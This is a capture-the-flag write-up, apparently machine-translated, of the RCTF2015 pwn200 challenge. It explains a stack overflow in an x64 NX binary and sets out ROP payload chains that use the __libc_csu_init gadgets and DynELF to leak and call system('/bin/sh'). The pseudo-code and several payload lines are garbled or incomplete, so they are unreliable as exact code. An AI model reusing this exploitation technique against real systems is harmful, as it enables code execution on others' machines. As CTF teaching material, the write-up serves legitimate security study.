Analysis of RCTF2015 PWN test questions

pwn200

The vulnerability is obvious, first read the local array of main, and then in the child function to the sub-function of the local array stack copy.

The general idea is to leak the address of the system, then write/bin/sh to a fixed address, and finally execute the system function

Leak uses the dynelf implementation of the PWN library, using the ROP chain as a whole.

1 //ida Pseudo-code2 int__fastcall Echo (__int64 A1)3 {4Char s2[ -];//[sp+10h] [bp-10h]@25 6for (i =0;* (_byte *) (i + A1); ++i)7S2[i] = * (_byte *) (i + A1);8S2[i] =0;9if (!STRCMP ("ROIS", S2))Ten   { Oneprintf"Rctf{welcome}", S2); APuts"is not flag"); -   } -Return printf ("%s", S2); the}

Here is the data copied, but his judgment is byte!= ' \x00 ', that is, if there is ' \x00 ' will stop copying.

This is very painful, because there must be 00 AH. 00 this is unavoidable.

First of all, this problem is x64 environment +NX protection. This means that ROP can be achieved by using universal gadget.

If you don't think about the truncated thing, exp is like this,

exp= ' A ' *24

Exp+=p64 (0x40089a) # __libc_csu_init in general Gadget,pop6ret

EXP+=P64 (0) #令pop RBX to 0 to make call execute correctly

EXP+=P64 (1) #令pop RBP is 1, the equivalent result is obtained for CMP comparison

EXP+=P64 ([email protected]) #pop R12 This decision after the content of call, why use got table, because the PLT inside is instruction Ah, can not take.

EXP+=P64 (8) #pop R13 No. 3rd parameter.

Exp+=p64 (leak adress) #pop R14 No. 2nd parameter.

EXP+=P64 (1) #pop R15 No. 1th parameter.

Exp+=p64 (0x0400880) #这个就跳去执行call了

exp+= ' A ' * #这是共抬了56个字节的栈

EXP+=P64 ( 0x4007cd) #从头 started.

The above is the normal way to use __libc_csu_init's universal springboard for ROP. Shall we take a look at this? Obviously not going to break in Exp+=p64 (0) here. But because there is also in the main stack, it constructs a pop4ret to read the stack of main.

This makes it possible to succeed without the ' \x00 ' limit. But I think this should be a better design, because if the distance is not 32 bytes is 96 bytes What to do? There's no pop12ret, right?

The next task is to construct the ROP chain, implement write/bin/sh and execute sysem, assuming we have leak the address of the system.

exp= ' A ' *24

Exp+=p64 (0x40089a) # __libc_csu_init in general Gadget,pop6ret

EXP+=P64 (0) #令pop RBX to 0 to make call execute correctly

EXP+=P64 (1) #令pop RBP is 1, the equivalent result is obtained for CMP comparison

EXP+=P64 (System) #pop R12 This decision after the content of call, why use the Got table, because the PLT inside is instruction Ah, can not take.

EXP+=P64 (8) #pop R13 No. 3rd parameter.

EXP+=P64 (save adress) #pop R14 No. 2nd parameter.

EXP+=P64 (1) #pop R15 No. 1th parameter.

Exp+=p64 (0x0400880) #这个就跳去执行call了

exp+= ' A ' * #这是共抬了56个字节的栈

Exp+=p64 (0X4007CD) # visible routines are the same

Note that the leak out system can be used only if it is written to an unknown address.

Finally, one more time.

exp= ' A ' *24

Exp+=p64 (0x40089a) # __libc_csu_init in general Gadget,pop6ret

EXP+=P64 (0) #令pop RBX to 0 to make call execute correctly

EXP+=P64 (1) #令pop RBP is 1, the equivalent result is obtained for CMP comparison

EXP+=P64 (save adress) #pop R12 This decision after the content of call, why use got table, because the PLT inside is instruction Ah, can not take.

EXP+=P64 (0) #pop R13 No. 3rd parameter.

EXP+=P64 (0) #pop R14 No. 2nd parameter.

EXP+=P64 (save Adress+8) #pop R15 No. 1th parameter.

Exp+=p64 (0x0400880) #这个就跳去执行call了

exp+= ' A ' * #这是共抬了56个字节的栈

Exp+=p64 (0X4007CD) # visible routines are the same

Analysis of RCTF2015 PWN test questions